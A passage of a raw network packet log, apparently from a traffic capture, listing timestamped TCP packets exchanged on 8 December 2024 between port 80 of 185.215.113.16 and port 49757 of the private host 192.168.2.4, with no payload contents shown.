Dec 8, 2024 19:52:38.962714911 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.962765932 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.962829113 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.962876081 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.963618040 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.963668108 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.963733912 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.963779926 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.964569092 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.964621067 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.964651108 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.964693069 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.965516090 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.965550900 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.965576887 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.965595007 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.966432095 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.966484070 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.966603041 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.966650963 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.967359066 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.967413902 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.967492104 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.967540979 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.968260050 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.968312979 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.968348980 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.968388081 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.969197035 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.969245911 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.969311953 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.969361067 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.970288992 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.970359087 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.970396042 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.970448017 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.971226931 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.971282959 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.971324921 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.971370935 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.971990108 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.972047091 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.972090960 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.972135067 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.972910881 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.972975969 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.973035097 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.973083019 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.973968983 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.974021912 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.974081993 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.974131107 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.974756002 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.974814892 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.974889994 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.974939108 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.975636005 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.975687981 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.975761890 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.975810051 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.976584911 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.976641893 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.976671934 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.976716042 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.977576017 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.977627993 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.977672100 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.977720976 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.978427887 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.978477955 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.978607893 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.978656054 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.979511023 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.979571104 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.979598045 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.979643106 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.980387926 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.980459929 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.980469942 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.980514050 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.981295109 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.981345892 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.981457949 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.981503963 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.982101917 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.982156992 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.982239008 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.982285976 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.983033895 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.983087063 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.983191967 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.983243942 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.983953953 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.984004974 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.984025002 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.984071970 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.128730059 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.128789902 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.128833055 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.128880024 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.129019976 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.129157066 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.129170895 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.129204988 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.129698992 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.129745960 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.129820108 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.129861116 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.130827904 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.130882978 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.131104946 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.131146908 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.131254911 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.131298065 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.131839037 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.131882906 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.132045031 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.132086039 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.132844925 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.132884979 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.132951975 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.132998943 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.133708954 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.133734941 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.133752108 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.133770943 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.134674072 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.134721994 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.134768963 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.134809971 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.135602951 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.135643005 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.135668993 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.135708094 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.136424065 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.136467934 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.136499882 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.136538029 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.137367010 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.137408972 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.137439966 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.137476921 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.138282061 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.138329983 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.138392925 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.138433933 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.139334917 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.139384031 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.139916897 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.139966011 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.140198946 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.140243053 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.140300989 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.140340090 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.141264915 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.141311884 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.141352892 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.141383886 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.142123938 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.142167091 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.142205000 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.142242908 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.142918110 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.142962933 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.142991066 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.143029928 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.145623922 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.145646095 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.145662069 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.145668983 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.145675898 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.145692110 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.145693064 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.145715952 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.145745993 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.145921946 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.145961046 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.147093058 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.147142887 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.147216082 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.147253990 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.148085117 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.148102045 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.148133039 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.148148060 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.148636103 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.148677111 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.148758888 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.148797035 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.149583101 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.149630070 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.149831057 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.149878979 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.150542974 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.150588989 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.150655031 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.150698900 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.151460886 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.151483059 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.151504040 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.151531935 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.152323961 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.152369022 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.152513981 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.152554035 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.153220892 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.153269053 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.153367043 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.153414011 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.154131889 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.154172897 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.154261112 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.154298067 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.155061007 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.155111074 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.155658007 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.155699968 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.156071901 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.156085968 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.156116009 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.156132936 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.156909943 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.156951904 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.157051086 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.157085896 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.157906055 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.157947063 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.158035040 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.158077955 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.158761024 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.158777952 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.158801079 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.158818960 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.159782887 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.159812927 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.159822941 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.159858942 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.160729885 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.160783052 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.160832882 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.160871029 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.161559105 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.161606073 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.161890984 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.161935091 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.162647963 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.162686110 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.162746906 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.162784100 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.163439989 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.163492918 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.163548946 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.163583040 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.164201975 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.164247036 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.164253950 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.164290905 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.165294886 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.165317059 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.165344000 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.165354013 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.166124105 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.166163921 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.166238070 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.166285038 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.167220116 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.167300940 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.167355061 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.167402029 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.168265104 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.168313026 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.168366909 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.168396950 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.169280052 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.169323921 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.169399977 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.169435024 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.170021057 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.170068026 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.170155048 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.170192003 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.170708895 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.170761108 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.170838118 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.170872927 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.171667099 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.171715975 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.171792030 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.171834946 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.172698975 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.172727108 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.172749043 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.172756910 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.173532963 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.173578024 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.173584938 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.173620939 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.174475908 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.174520969 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.174622059 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.174664021 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.175232887 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.175277948 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.175414085 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.175477028 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.176325083 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.176338911 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.176373005 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.176390886 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.320594072 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.320621014 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.320658922 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.320688963 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.320720911 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.320763111 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.320816040 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.320857048 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.321639061 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.321705103 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.321736097 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.321783066 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.322594881 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.322644949 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.322710991 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.322756052 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.323226929 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.323272943 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.323288918 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.323329926 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.324191093 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.324235916 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.324367046 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.324413061 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.325229883 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.325274944 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.325354099 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.325400114 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.326051950 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.326101065 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.326229095 CET	80	49757	185.215.113.16	192.168.2.4
